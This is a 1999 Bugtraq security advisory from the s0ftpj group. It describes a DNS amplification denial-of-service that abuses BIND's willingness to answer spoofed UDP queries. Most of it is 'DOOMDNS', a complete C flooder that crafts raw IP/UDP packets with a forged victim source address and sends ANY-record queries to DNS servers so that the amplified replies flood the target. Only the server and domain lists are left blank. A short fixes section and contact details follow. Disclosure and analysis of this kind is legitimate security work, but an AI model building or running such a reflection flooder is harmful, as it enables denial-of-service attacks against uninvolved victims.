Subject:      Possible Denial Of Service using DNS
To: BUGTRAQ@SECURITYFOCUS.COM 


SPJ-002-000:


                   .::::::::+[ s0ftpr0ject 99 ]+::::::::.
                   ::::+[ Digital Security for Y2K ]+::::
                   :::'"""`"'"""`"'"""`"'"""`"'"`"'""`:::
                   ::'.g#S$"$S#n. .g#S$"$S#n.     S#n.`::
                   :: $$$$$ $$$$$ $$$$$ $$$$$     $$$$ ::
                   :: $$$$$       $$$$$ $$$$$     $$$$ ::
                   :: `$$$$$$$$$n $$$$$ $$$$$     $$$$ ::
                   ::       $$$$$ $$$$$s$$$$'     $$$$ ::
                   :: $$$$$ $$$$$ $$$$$     $$$$$ $$$$ ::
                   :: `$$$$s$$$S' `$$$$     `$$$$s$$S' ::
                   :::...........:.....:::::..........:::
                   :::+[ Security Advisory, 002-000 ]+:::
                   `::::::::+[ July 19, 1999 ]+:::::::::'



                    Possible Denial Of Service using DNS


                      by |scacco| <scacco@s0ftpj.org>



---[ Systems affected ]-------------------------------------------------------


All systems running Bind (All versions seems affected).




---[ Condition of discovery ]-------------------------------------------------


This misfeature was discovered configuring bind on a Red Hat 5.2 system
shipped with the original cdrom, allowing udp dns requests and without
access lists.



---[ Detailed description ]---------------------------------------------------


All domain name systems resides on port 53 formely called domain. Looking at
rfc and in particular at RedHat system defaults seems that port 53 is enabled
to support udp and tcp requests as specified in /etc/services file:


domain          53/tcp
domain          53/udp


It's possible to flood someone sending spoofed UDP QUERY to the DNS,
because UDP doesn't provide a fruitful authentication process.
Why use DNS QUERY? Simple. We just want to make sure we've got a real advantage
against our nice target so we look for a good I/O ratio. With just a few bytes
(20-30) we can achieve responses of around 400-500 bytes. So we usually
achieve a 20x ratio. Furthemore, every DNS reply will eligit ICMP unreach
packets from the target since no UDP port will be open to accept data.
A modem user compared with large RR of type * (0xFF) will be flooded.                                     *



---[ Exploitation ]-----------------------------------------------------------


/******************************************************************
*                                                                 *
* DOOMDNS       Yet another flooder with 1:x pkts ratio. This one *
*               exploits DNS simple QUERY with spoofed UDPs.      *
*               Since almost every DNS is bound to answer queries *
*               from the void, and since UDP doesn't provide a    *
*               fruitful authentication process cause plain TCP   *
*               does, uh !? ;) here we are.                       *
*                                                                 *
*                              hints by |scacco|, code by FuSyS   *
*                              http://www.s0ftpj.org              *
*                                                                 *
******************************************************************/


#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <time.h>


#define IP_HEAD_BASE            20
#define UDP_HEAD_BASE           8


unsigned long saddr;
int sfd, loop;
char *dns_def[]={/* LISTA ASSENTE */ ,NULL};
char *domains[]={/* LISTA ASSENTE */ ,NULL};


struct DNS_MSG {
        HEADER head;
        char query[255];
};


struct dns_pkt {
        struct iphdr ip;
        struct udphdr udp;
        char data[1000];
};


unsigned long nameResolve(char *hostname)
{
  struct in_addr addr;
  struct hostent *hostEnt;


  if((addr.s_addr=inet_addr(hostname)) == -1)
  {
    if(!(hostEnt=gethostbyname(hostname)))
    {
        fprintf(stderr,"N0 SUCH H0ST:`%s`\n",hostname);
        exit(0);
    }
    bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
  }
  return addr.s_addr;
}


void forge (unsigned long daddr, unsigned short src, unsigned short dst)
{
        struct sockaddr_in sin;
        struct dns_pkt dpk;
        struct DNS_MSG killer;
        int shoot, len;


        memset(&killer, 0, sizeof(killer));
        killer.head.id=getpid();
        killer.head.rd=1;
        killer.head.aa=0;
        killer.head.opcode=QUERY;
        killer.head.qr=0;
        killer.head.qdcount=htons(1);
        killer.head.ancount=htons(0);
        killer.head.nscount=htons(0);
        killer.head.arcount=htons(0);
        strcat(killer.query, domains[--loop]);
        killer.query[strlen(domains[loop])+2]=0x00FF;
        killer.query[strlen(domains[loop])+4]=0x0001;


        memset(&dpk, 0, sizeof(dpk));


        dpk.udp.source=src;
        dpk.udp.dest=dst;
        len=(12+strlen(killer.query)+5);
        dpk.udp.len=htons(UDP_HEAD_BASE+len);
        memcpy(dpk.data, (void*)&killer, len);


        dpk.ip.ihl=5;
        dpk.ip.version=4;
        dpk.ip.tos=0;
        dpk.ip.tot_len=htons(IP_HEAD_BASE+UDP_HEAD_BASE+len);
        dpk.ip.frag_off=0;
        dpk.ip.ttl=64;
        dpk.ip.protocol=IPPROTO_UDP;
        dpk.ip.saddr=saddr;
        dpk.ip.daddr=daddr;


        memset(&sin, 0, sizeof(sin));
        sin.sin_family=AF_INET;
        sin.sin_port=dst;
        sin.sin_addr.s_addr=daddr;


        shoot=sendto(sfd, &dpk,IP_HEAD_BASE+UDP_HEAD_BASE+len,
                0, (struct sockaddr *)&sin, sizeof(sin));
        if(shoot<0)fprintf(stderr, "SPOOF ERROR");
        loop++;
}


void doomzone (void)
{
        unsigned long daddr;
        unsigned short source, dest;
        
        if(dns_def[loop]==NULL) loop=0; 
        daddr=nameResolve(dns_def[loop++]);
        source=htons(1024+(rand()%2000));
        dest=htons(53);
        forge(daddr, source, dest);
}


int main (int argc, char **argv)
{
        int sfdo;
        unsigned int hz=100;


        if(argc<2) {
                fprintf(stderr, "Interesting .... let's flood ourselves ?!\n");
                fprintf(stderr, "Use: %s target [n]\n", argv[0]);
                exit(0);
        }


        if(argv[2]) hz=atoi(argv[2]);
        saddr=nameResolve(argv[1]);


        srand(time(NULL));


        if((sfd=socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0) {
                fprintf(stderr, "\nSOCK_RAW Died\n");
                exit(2);
        }
        sfdo=1;
        if(setsockopt(sfd, IPPROTO_IP, IP_HDRINCL, &sfdo, sizeof(sfdo))<0) {
                fprintf(stderr, "\nIP_HDRINCL Died\n");
                exit(3);
        }


        printf("\n\033[1;32mD00M DNS\033[0m");
        printf("\n\033[1;34mDNS Flooder by FuSyS\033[0m");
        printf("\n\033[1;34minithints by |scacco|\033[0m\n\n");


        loop=0;
        while(hz--) {
                doomzone();
                printf("\033[1;34m.\033[0m");
        }       
        printf("\n\n");
        return(0);
}



---[Possible fixes ]----------------------------------------------------------


Seems hard to fix this hole due to dns protocol specification, it could be
possible to setup access lists or some sort of packet sanity check, for this
we want suggest you to keep in contact with ISC staff to get a more efficent
solution for this problem.



---[ URLs and references ]----------------------------------------------------


Internet Software Consurtium can be found at http://www.isc.org.
This is also the home of bind.


---[ Contact informations ]---------------------------------------------------


s0ftpr0ject 99 - Digital security for Y2K (s0ftpj)
no-profit security research


Internet site: http://www.s0ftpj.org
E-mail       : staff@s0ftpj.org



All advisories and security documents are available via http at:


http://www.s0ftpj.org (195.32.69.44) courtesy of Metro Olografix
http://www.olografix.org (195.32.69.44)


This document has no copyright, feel free to distribute it without any
limitation. Original copy of this document can be found at out Internet site
for free. You are not allowed to modify this paper without prior notify to
s0ftpr0ject staff at staff@s0ftpj.org.




---[ s0ftpr0ject 99 staff Public PGP Key ]------------------------------------


Type Bits/KeyID    Date       User ID
pub  2600/15A01BB9 1999/07/22 S0ftPj Staff <staff@s0ftpj.org>


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i


mQFSAzeXNL8AAAEKKNzvok6FkB24mQUEx5Q4SZ97dQlmx3yNeEvG7aJ/0TDKWWUv
f6a+t1jF8V7JMhV1JxU/z38MgTYRGt6dspWlTLKb543GxBRqOdMohigBu8rUmDEb
UlD9gAav5M+OSY6oNh5a7e/YrPLhOiqxNxBIXQCDgKtIUv9NF8KbcbS96EAmNsuH
UA/hJ2Arlx2wSkmJZgvcpiM6O/1g1OYgg7Gur39SqsNZn0RUKxi463qASGfJT4sa
rpH6clBsVpNei5bf/4Bke5/8dnJL5DzM0twxTUmvdq1Pt1+6sRCd70IsqXPvjZu2
Drx4rzlLItD84xmE9w/vGdLMtPSTPwX7ak2TvhWqBOkqzWJNiRjzi+T6HiNfuqUr
sr90FndiRNJcWCbmPs2TJISLePsi9AVGL5KFfmimdSJPagzWG1FVQhyo2HS4nRWg
G7kABRG0H1MwZnRQaiBTdGFmZiA8c3RhZmZAczBmdHBqLm9yZz6JAVoDBRA3lzS/
2HS4nRWgG7kBAaYiCiQPM05Pr5FkSgjHkVUbgyxwuWkp9MDOxhvFAgcsHJUX2h6V
F02vzDMR2BOvaRhkm43IwXxK490Tp86pbbhC28SiF3TEyHjmu8tMrXo/cX69fcqy
IbvVgHKEIUYR8Sik7mLX9HqUh9qh7e6o4cH5TsCCJxIoqf2Qt4t5HA4m77H1niNP
EqY2HGzvQUPfvTf+KffdLGoAa/NSKJyB8stlWIJ4SAe7EkGscSjcDFvrm25pDT33
JHyBHBdmUY0Kr+gzmg9CuUZUhVtdun0mwZJLicOSUFQeYuPsid+ayggdgfGR7spM
NymPkS2MF8jGOKCa9EqWbn5gBP0uZm5aMrg6+O+s+xNonK0BcFH7iIUAsL9qUHLD
4edFudwxa6XW7LuJoqDVlUzhqA3Ru5Yd8eTD7vbcjR3fRngDpLDu8UhC0MFQSoDW
IWKJ
=i4i0
-----END PGP PUBLIC KEY BLOCK-----